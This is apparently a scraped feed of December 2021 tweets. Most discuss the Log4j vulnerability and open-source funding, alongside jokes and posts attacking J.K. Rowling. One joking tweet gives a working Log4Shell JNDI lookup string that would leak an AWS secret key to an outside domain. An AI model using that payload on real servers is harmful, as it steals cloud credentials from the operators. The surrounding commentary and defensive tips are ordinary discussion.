https://twitter.com/jpaulreed/status/1469770852677816320

I'll just leave this right here: whoownsyoursoftwaresupplychain.com

J. Paul Reed (@jpaulreed)Sat, 11 Dec 2021 21:16 GMT

https://twitter.com/zackkanter/status/1470026849023631369

Local dev a first class consideration (long way to go now) along with IaC (getting better but still often afterthought).

Brian LeRoux (@brianleroux)Sun, 12 Dec 2021 15:15 GMT

If AWS were rebuilt today, what high-level incidental complexity do you wish would be eliminated via different design decisions? E.g. issues with ARNs or URL structure, or even ‘I want regions for data sovereignty, not resiliency.’ Bonus for examples creating toil inside AWS.

Zack Kanter (@zackkanter)Sun, 12 Dec 2021 13:44 GMT

https://twitter.com/neverpilled/status/1469675906893594628

They took 2 pounds of weed 2 hand guns and $70 (SEVENTY!!!) off the street and posing like they just took down Pablo Escobar 😂😂😂😂😂😂😂😂😂😂

The Negromancer (@kokujin37)Sat, 11 Dec 2021 21:29 GMT

There’s not a single line in “Santa claus is coming to town” that makes it sound like a good thing. If it wasn’t for the jaunty tune I’d interpret it the same way as a warning the 4 horsemen of the apocalypse were arriving.

Andrew Nadeau (@TheAndrewNadeau)Mon, 13 Dec 2021 04:21 GMT

https://twitter.com/hillelogram/status/1470202746649423875

there are literal generations of coders who know that RMS is a creep but have no idea what the FSF does, or know that GNU/Linux is a meme but not why they are supposed to have ever cared

Ian Coldwater 📦💥 (@IanColdwater)Mon, 13 Dec 2021 01:35 GMT

https://twitter.com/seldo/status/1470031613174042626

Open source is free as in puppy.

Laurie Voss (@seldo)Sun, 12 Dec 2021 16:26 GMT

you want me to make a decision? the thing that killed chidi anagonye?

salwa (@evermorevan)Sun, 12 Dec 2021 18:26 GMT

I read once that people who live alongside orangutans have a belief/legend that orangutans can actually speak, but they refuse to because humans would put them to work if they knew. I think about that a lot.

i bless the rains down in castamere (@Chinchillazllla)Sun, 12 Dec 2021 16:27 GMT

https://twitter.com/jk_rowling/status/1470092815506063365

You literally have a castle and you spend your time doing this

Rob (@robrousseau)Mon, 13 Dec 2021 01:47 GMT

JK Rowling trying to make trans women out to be rapists is a new low. It’s part of the TERF tactics and it goes to show how far down the transphobia rabbit hole she’s gone. Trans women are not rapists. Trans women are women, who just want a chance to live like any other woman.

Erin, Trail Mom (@ErinInTheMorn)Mon, 13 Dec 2021 00:17 GMT

https://twitter.com/jk_rowling/status/1470092815506063365

It’s striking that J.K.Rowling only has the energy to speak out about sexual assault when it’s in service of a spurious moral panic around trans people. At the end of the day, you do just have to conclude that she’s a common garden reactionary.

Scrooge McDuck 📕 (@amphitryoniades)Sun, 12 Dec 2021 23:15 GMT

jk rowling is a bad person w/ bad politics, a childish understanding of feminism and a truly ugly spirit. it’s embarrassing to look at her tweets. it’s upsetting to watch her harm marginalized people. it’s infuriating to me as a feminist, as an assault survivor and as a woman.

jourdain searles (@judysquirrels)Mon, 13 Dec 2021 07:09 GMT

https://twitter.com/BlueLightAlarm/status/1470333871476641793

Omg stop they’ve made 1 tweet

Adam (@adamrbrts)Mon, 13 Dec 2021 10:06 GMT

A rare insightful comment on the orange site: news.ycombinator.com/item?id=295252… "Open source is not broken".

Danack (@MrDanack)Sun, 12 Dec 2021 22:11 GMT

The eruption of The Fagradalsfjall volcano, Iceland. Photo by Arnar Kristjansson

Diane Doniol-Valcroze (@ddoniolvalcroze)Sun, 12 Dec 2021 17:07 GMT

To everyone astonished at how wide-spread Java usage really is: what you've just seen is just the stuff using Log4J2. ;)

Lars Rosenquist (@larsrosenquist)Sun, 12 Dec 2021 11:24 GMT

don't forget you can get those sweet environment variables ${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.mydogsbutt.com}

DilDog (@dildog)Sat, 11 Dec 2021 21:48 GMT

A whole lot of engineers worked all weekend and deserve the week off. Friendly reminder that you should give it to them.

emily freeman (@editingemily)Mon, 13 Dec 2021 06:06 GMT

Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.

Matthew Prince 🌥 (@eastdakota)Sat, 11 Dec 2021 22:47 GMT

I’ve tried very hard to find out who made this but it sadly just pops up on Imgur without any credits. So, with that disclaimer made, I desperately need people to know that I *love* this.

Charble Garble 🏳️‍🌈🇸🇪 (@charlottegore)Sat, 11 Dec 2021 21:39 GMT

Been thinking about the maintainers of log4j2 a ton this weekend. I'm so thankful for open source. While I get to maintain projects with support from my employer - most do this entirely with spare time Maintainers deserve our thanks (and sponsorships!) for their work 🤗🙏

Jeff Hollan (@jeffhollan)Sun, 12 Dec 2021 17:16 GMT

Something I do every December is clear out my Pocket queue and YouTube watch later list I spend a lot of time reading all the articles I’ve been putting off or I delete them It feels so nice starting a new year with no backlog. Highly recommend 🤘

Justin Garrison (@rothgar)Mon, 13 Dec 2021 06:23 GMT

Please tell me I'm not the only one who sees it. 😭 You see it, right? RIGHT?

Marjorie🧁 (@NotLargeMarge1)Thu, 09 Dec 2021 22:35 GMT

uh they absolutely do

Luke Plunkett (@LukePlunkett)Sun, 12 Dec 2021 20:38 GMT

This Christmas we're burning Yule Log4js

Richard Westmoreland  (@RSWestmoreland)Fri, 10 Dec 2021 21:18 GMT

Real talk: Garak was such a great combination of character & actor that he almost transcended the show & even Star Trek itself. They basically put an ambiguously gay John le Carré antihero into the middle of a space opera.

Post details

I'm dead.

MTN DEW: Spider Juice (@MtnDewJitsu)Sun, 12 Dec 2021 13:42 GMT

Zack Stentz (@MuseZack)Mon, 13 Dec 2021 02:23 GMT

I'm dead.

MTN DEW: Spider Juice (@MtnDewJitsu)Sun, 12 Dec 2021 13:42 GMT

Interviewer: Can you explain the gap in your CV? Me: I spent 6 hours formatting it in Google Docs and you've opened it in Word.

Clarissa Maycock (@ClarissaDM)Fri, 03 Sep 2021 10:40 +0000

We don’t need everyone to upgrade log4j, just enough for herd immunity to takeover

Ricky (@rickhanlonii)Sun, 12 Dec 2021 16:55 GMT

https://twitter.com/liran_tal/status/1469770636356722688

Pretty much every day for the last 10 years.

Dio Rettori (@rettori)Sat, 11 Dec 2021 20:58 GMT

Joining a union is a good idea anyway. So you should do that. I'm a member of @ProspectUnion. Who are best choice of the well established unions in the UK if you work in tech.

Post details

https://twitter.com/rjw1/status/1470139005559881733

We all join a union who uses the subs to pay maintainers (how we decide what needs maintaining becomes an issue)

bob (@rjw1)Sun, 12 Dec 2021 21:10 GMT

bob (@rjw1)Sun, 12 Dec 2021 21:44 GMT

Log4j recap - two random unpaid folk maintain the code - a random requested the vuln/feature in 2013 - major IT and security vendors rely on that code - problem was publicised by teens in Minecraft video game - scope of problem still unclear days later

Kevin Beaumont (@GossiTheDog)Sun, 12 Dec 2021 01:14 GMT

my friend told me halfway through giving birth she was like “I can’t do this, I simply cannot do this?” and they were like “oh you have to” and life is just like that all the time

SANDWORM (@christapeterso)Fri, 10 Dec 2021 09:30 GMT

The festive season is treating Terry’s chocolate orange as one of your five-a-day

Rebekah (@rkulidzan)Sun, 12 Dec 2021 13:22 GMT

https://twitter.com/ZiziFothSi/status/1469994367691763714

FLIRT LIZARD GONNA GET SOME HOLODICK

Katie (@ZiziFothSi)Sun, 12 Dec 2021 11:38 GMT

My #log4j status/tracking page is a little rough in spots, but the list of affected, claimed unaffected, and not-sure-yet products is getting the full undue diligence: techsolvency.com/story-so-far/c…

Royce Williams (@TychoTithonus)Sat, 11 Dec 2021 06:21 GMT

Consciously identifying that I have been talking solo for far too long at the zoom call but I have no idea how to wind this down so I just shout HAHA THAYS IT LIKE COMMENT AND SUBSCRIBE and throw my work laptop out of the window

laura with the red nose and the antlers (@freezydorito)Sun, 12 Dec 2021 11:48 GMT

Another chronically underfunded OSS library in the news. It’s simple: - Using OSS to make money? Fund it! - Want to see an OSS project advance? Fund it! - Want to help your dependencies succeed so you can hire people experienced in them? Fund them! NORMALIZE FUNDING OSS.

twitter.com/benjie/status/…

Post details

Why not take 5% of your engineering budget and invest it in the various open source projects you depend on? I'd hazard the returns you'd see over the coming years from this investment would be greater than having spent that same amount on payroll.

Benjie 🐘 (@Benjie)Thu, 18 Jun 2020 13:18 +0000

Benjie 🐘 (@Benjie)Sun, 12 Dec 2021 10:05 GMT

If you have a #Maven parent POM for your org or project, here's an enforcer rule to put into it which will ban any current of future usage of vulnerable #log4j2 versions. gist.github.com/gunnarmorling/…

Gunnar Morling 🌍 (@gunnarmorling)Sat, 11 Dec 2021 09:42 GMT

https://twitter.com/HOOKFanAcct/status/1469906909583097857

You deserve to get jumped

ASHUTOSH #GoGHC #PissariSTRONG 🥶🥶 (@PuroNerdAsh)Sun, 12 Dec 2021 05:49 GMT